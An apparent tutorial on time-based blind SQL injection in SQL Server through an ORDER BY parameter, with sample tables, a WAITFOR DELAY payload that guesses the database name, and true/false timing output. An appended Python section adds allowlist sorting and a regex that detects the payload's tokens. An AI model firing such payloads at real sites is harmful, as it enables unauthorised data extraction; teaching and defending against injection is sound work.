0x01 Preface

This is essentially the same as ordinary time-based (delay) injection.

Just note the syntax.

0x02 Test data

    1> select * from article;
    2> go
    +----+-----------+-----------+
    | id | title | content |
    +----+-----------+-----------+
    | 1 | 测试标题 | 测试内容 |
    | 2 | 测试标题2 | 测试内容2 |
    +----+-----------+-----------+
    (2 rows affected)

    # Test table data: users;
    sql server> select * from users;
    +----+--------------+----------+
    | id | username | password |
    +----+--------------+----------+
    | 1 | test-user-01 | 123456 |
    | 2 | test-user-02 | 234567 |
    +----+--------------+----------+
    2 rows in set (0.00 sec)

    sql server> SELECT system_user;
    +-----------------------+
    | field1 |
    +-----------------------+
    | sa |
    +-----------------------+
    1 row in set (0.00 sec)

    sql server> select db_name();
    +-----------------------+
    | field1 |
    +-----------------------+
    | test |
    +-----------------------+
    1 row in set (0.00 sec)

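0x03 Example: guessing the database name

Note: changing the argument of db_name() returns other database names.
For example:
db_name() returns the database of the current connection
db_name(1) returns database 1
db_name(2) returns database 2

Web request: http://www.test.com/sql.php?orderby=id IF(db_name() like '%test%') waitfor delay '0:0:5' -- a

Database statement: select * from article order by id IF(db_name() like '%test%') waitfor delay '0:0:5' -- a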

    # Case where the condition is true
    1> SELECT
    *
    FROM
    article
    ORDER BY
    id
    IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a
    2> go
    +----+-----------+-----------+
    | id | title | content |
    +----+-----------+-----------+
    | 1 | 测试标题 | 测试内容 |
    | 2 | 测试标题2 | 测试内容2 |
    +----+-----------+-----------+
    (2 rows affected) (5.064 sec)

    # Case where the condition is false
    1> SELECT
    *
    FROM
    article
    ORDER BY
    id
    IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a
    2> go
    +----+-----------+-----------+
    | id | title | content |
    +----+-----------+-----------+
    | 1 | 测试标题 | 测试内容 |
    | 2 | 测试标题2 | 测试内容2 |
    +----+-----------+-----------+
    (2 rows affected) (0.064 sec)
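
A defensive counterpart to the payload above, as an added example that is not part of the original post: the `orderby` value is mapped through an allowlist instead of being concatenated into the statement, and rejected values are checked for the tokens the payload uses. The column allowlist, the function names and the sample URLs are assumptions constructed for illustration, and Python is used here although the page's endpoint is sql.php.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: sortable columns are those of the article table shown above.
ALLOWED_COLUMNS = {"id": "[id]", "title": "[title]", "content": "[content]"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

# T-SQL tokens from the page's payload that never belong in a sort parameter.
SUSPICIOUS = re.compile(r"waitfor\s+delay|\bif\s*\(|db_name\s*\(|--|;", re.I)


def build_order_by(raw):
    """Map the orderby parameter to a fixed clause; raise ValueError otherwise.

    Identifiers cannot be bound as query parameters, so the input only
    selects among strings the application itself wrote.
    """
    parts = raw.strip().lower().split()
    if not 1 <= len(parts) <= 2 or parts[0] not in ALLOWED_COLUMNS:
        raise ValueError("unsupported sort column")
    direction = "ASC" if len(parts) == 1 else ALLOWED_DIRECTIONS.get(parts[1])
    if direction is None:
        raise ValueError("unsupported sort direction")
    return f"ORDER BY {ALLOWED_COLUMNS[parts[0]]} {direction}"


def flag_requests(urls, param="orderby"):
    """Return (url, looks_like_injection) for every rejected sort value."""
    hits = []
    for url in urls:
        for value in parse_qs(urlsplit(url).query).get(param, []):
            try:
                build_order_by(value)
            except ValueError:
                hits.append((url, bool(SUSPICIOUS.search(value))))
    return hits


# Constructed sample requests; the second is the page's payload, URL-encoded.
SAMPLE_URLS = [
    "http://www.test.com/sql.php?orderby=title+desc",
    "http://www.test.com/sql.php?orderby=id+IF(db_name()+like+'%25test%25')"
    "+waitfor+delay+'0:0:5'+--+a",
    "http://www.test.com/sql.php?orderby=price",
]

if __name__ == "__main__":
    for url, suspicious in flag_requests(SAMPLE_URLS):
        print("INJECTION?" if suspicious else "rejected", url)
```

Because the clause is assembled only from strings in the allowlist, the trailing `IF ... WAITFOR` batch never reaches the server, and the 5-second timing difference shown above disappears.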